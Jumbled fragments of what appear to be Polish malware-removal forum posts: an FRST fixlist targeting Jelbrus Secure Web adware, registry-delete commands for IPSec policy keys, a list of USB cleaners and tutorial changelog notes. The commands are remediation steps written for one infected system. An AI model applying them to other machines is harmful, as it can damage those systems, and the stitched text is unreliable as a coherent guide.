System32\Tasks\Jelbrus Secure Web Task => C:\Program Files (x86)\Jelbrus Secure Web\jswtask.exe [2015-03-07] (Jelbrus) Task: {FB1E4864-E505-4E29-9297-93DBEB617894} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe HKU\S-1-5-21-3839221274-3043303846-3843884880-1000\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-19\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-20\Control Panel\Desktop\\SCRNSAVE.EXE -> BHO-x32: SecureWebBHO Class -> {D3C24E2B-C820-4492-9B69-11BF7163F998} -> C:\Program Files (x86)\Jelbrus Secure Web\jsie.dll [2015-03-07] (Jelbrus) BHO-x32: IplexToALLPlayer -> {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} -> C:\PROGRA~2\ALLPLA~1\Iplex\IPLEXT~1.DLL No File FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll No File FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll No File FF Extension: Firefox Helper - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\46e8892acb6c0d0e86909049e28d3dd5 [2015-03-07] C:\Program Files (x86)\Jelbrus Secure Web C:\Program Files (x86)\PrivateVPN C:\Users\Kuba\AppData\Roaming\65F3.tmp C:\Users\Kuba\AppData\Roaming\NetMon C:\Windows\mlwps.exe C:\windows\SysWOW64\temp.* File: C:\windows\SysWOW64\tasks.dll RemoveProxy: Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /f Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Wypowiedz się czy ustąpiły problemy z ładowaniem stron i reklamami.

Infekcje z mediów przenośnych Flash Disinfector (2008) Kaspersky RadminerFlashRestorer (2010, usunięty) MCShield (2014, problemy z działaniem, martwa strona) Remediate VBS Worm (2016) UsbFix (2021, trudności z pobieraniem i blokowaniem przez Windows Defender)

Te hyperlinki to na pewno nowe aktywne adware. Natomiast "500 Internal Privoxy Error" pochodzi od wspominanego już szkodnika "Jelbrus Secure", który utylizuje legalny filtr Privoxy. Jeśli to możliwe, pobierz najnowszy FRST z poziomu innego komputera i za pomocą pendrive go przetransportuj na ten komputer.

Hitman sugeruje instalację nowych śmieci. W usuwanych elementach widać m.in. szkodliwy most proxy Jelbrus Secure - tego nie było w poprzednich skanach FRST. Druga sprawa: logi FRST pochodzą z wersji 22-02-2015, to wersja która nie miała jeszcze skanu polityk IPSec. Proszę pobierz najnowszy FRST i zrób nowy skan. EDIT: leon665, proszę nie dopisuj się do cudzych tematów. Udzielam nadal pomocy, a przerwa jest dyktowana kłopotami ze zdrowiem. Odpowiadam, gdy mogę i mam czas.

Cały poniższy opis schowany. To martwe narzędzie. Jego następcą jest Registry Jumper i opisy powinny zostać wymienione.

Lista zmian 2013-2020 Rewizje tutorialu: [Obecnie odpowiadam także za aktualizacje angielskiej wersji tutoriala FRST. Wcześniej moja rola była ograniczona do sugerowania zmian. Moje aktualizacje zaczynają się od dnia 04/20/2016.]